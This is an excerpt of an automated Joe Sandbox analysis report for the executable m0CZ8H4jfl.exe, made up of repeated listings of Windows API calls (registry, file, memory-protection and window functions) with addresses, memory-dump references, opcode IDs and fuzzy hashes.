                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                          • String ID:
                                                                                                          • API String ID: 334405425-0
                                                                                                          • Opcode ID: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                          • Instruction ID: 561ed2f99fcd8f3c69216c61aae9e950b585f3ecd418fa9455324ea25216acba
                                                                                                          • Opcode Fuzzy Hash: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                          • Instruction Fuzzy Hash: 8221A731900209EBDF20AF65CE48A9E7E71BF00354F20427BF510B51E1CBBD8A81DA5D
                                                                                                          APIs
                                                                                                            • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,0000046B,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsw2CAB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Enum$CloseOpenValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 167947723-0
                                                                                                          • Opcode ID: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                          • Instruction ID: caa0a88e983a87845293d3a09aded013c5498a2120ee6ea3f3930af667db2d56
                                                                                                          • Opcode Fuzzy Hash: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                          • Instruction Fuzzy Hash: 9FF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                                                                          APIs
                                                                                                          • SetFilePointer.KERNELBASE(00000000), ref: 10002963
                                                                                                          • GetLastError.KERNEL32 ref: 10002A6A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1797544878.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1797527224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1797584618.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1797605819.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10000000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                          • String ID:
                                                                                                          • API String ID: 2976181284-0
                                                                                                          • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                          • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                                                          • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                          • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                                                          APIs
                                                                                                            • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,0000046B,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsw2CAB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 3677997916-0
                                                                                                          • Opcode ID: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                          • Instruction ID: 28617f4b1a8802b5017de0243b5a45cf97da40b04a50325282b533cdbf166070
                                                                                                          • Opcode Fuzzy Hash: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                          • Instruction Fuzzy Hash: 64115E31911205EBDB14CFA4DA489AEB7B4EF44354B20843FE446B72D0DAB89A41EB59
                                                                                                          APIs
                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                          • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3850602802-0
                                                                                                          • Opcode ID: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                          • Instruction ID: cd3aabbb77ee63ed71f9921c47df44d3aa6e588553b0b950a072bc92d791a3e5
                                                                                                          • Opcode Fuzzy Hash: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                          • Instruction Fuzzy Hash: 2101F4316202209FE7095B389D05B6A3698E710319F10863FF851F62F1DA78DC428B4C
                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32(?,?,?,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                            • Part of subcall function 004063BF: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                            • Part of subcall function 004063BF: wsprintfW.USER32 ref: 00406411
                                                                                                            • Part of subcall function 004063BF: LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 2547128583-0
                                                                                                          • Opcode ID: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                          • Instruction ID: 5d7b52194fecd52e31197542c52f699420a2dcfb6f4997f05ddeecd74f4f3bdc
                                                                                                          • Opcode Fuzzy Hash: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                          • Instruction Fuzzy Hash: 70E0863660422066D61057705E44D3763AC9E94704306043EFA46F2041DB78DC32AA6E
                                                                                                          APIs
                                                                                                          • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$EnableShow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1136574915-0
                                                                                                          • Opcode ID: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
                                                                                                          • Instruction ID: 46dfe73b81ae29a5099323896a5bc3e3d9df575198e3285abdeb67f25c429c8d
                                                                                                          • Opcode Fuzzy Hash: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
                                                                                                          • Instruction Fuzzy Hash: 76E08C326005009BCB10AFB5AA4999D3375DF90369710007BE402F10E1CABC9C409A2D
                                                                                                          APIs
                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\m0CZ8H4jfl.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$AttributesCreate
                                                                                                          • String ID:
                                                                                                          • API String ID: 415043291-0
                                                                                                          • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                          • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                                                                          • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                          • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                                                                          APIs
                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405706
                                                                                                          • GetLastError.KERNEL32 ref: 00405714
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 1375471231-0
                                                                                                          • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                          • Instruction ID: 3f205c5890689a668e8791f8cf6ed098ce3dcc56284ebb1818e0a19aeae2b5ff
                                                                                                          • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                          • Instruction Fuzzy Hash: DBC04C30225602DADA106F34DE087177951AB90741F1184396146E61A0DA348415E93D
                                                                                                          APIs
                                                                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                                                                            • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FilePointerwsprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 327478801-0
                                                                                                          • Opcode ID: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                          • Instruction ID: c5c3fa32fc6d0159c61c67e46e8878479b4609e7a69e49ca0ebb3ecbbe822ed2
                                                                                                          • Opcode Fuzzy Hash: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                          • Instruction Fuzzy Hash: A0E04F71702514EFDB01AFA59E4ACAFBB6AEB40328B14443BF501F00E1DA7D8C019A2D
                                                                                                          APIs
                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrivateProfileStringWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 390214022-0
                                                                                                          • Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                          • Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
                                                                                                          • Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                          • Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.KERNELBASE(00000000,0000046B,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Open
                                                                                                          • String ID:
                                                                                                          • API String ID: 71445658-0
                                                                                                          • Opcode ID: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                          • Instruction ID: 180cb462b76767e938a43b2c67eaf1f9418a6812eb156052446fd1a81c43fca4
                                                                                                          • Opcode Fuzzy Hash: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                          • Instruction Fuzzy Hash: 54E0BF76154108AFDB00DFA5EE46EA977ECAB44704F044025BA09E7191C674E5509768
                                                                                                          APIs
                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A20,000000FF,00416A20,000000FF,000000FF,00000004,00000000), ref: 00405CF0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3934441357-0
                                                                                                          • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                          • Instruction ID: d2761c75b63c3b5a1b4cb2cfb4b6a55fbed1fd27b7f8bdfe76624f6b99830631
                                                                                                          • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                          • Instruction Fuzzy Hash: 2AE0EC3221425AABDF109E55EC08FEB7B6CEF05360F049437FA55E7190D631E921DBA4
                                                                                                          APIs
                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CC1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 2738559852-0
                                                                                                          • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                          • Instruction ID: 881bd9ca443264ea0180802fa9c86a3c9bfb0e6b132b989af4612487e9445b73
                                                                                                          • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                          • Instruction Fuzzy Hash: D1E08632104259ABDF105E518C00AEB376CFB04361F104432F911E3140D630E8119FB4
                                                                                                          APIs
                                                                                                          • VirtualProtect.KERNELBASE(1000405C,00000004,?,1000404C), ref: 100027E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1797544878.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1797527224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1797584618.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1797605819.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10000000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                          • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                                          • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
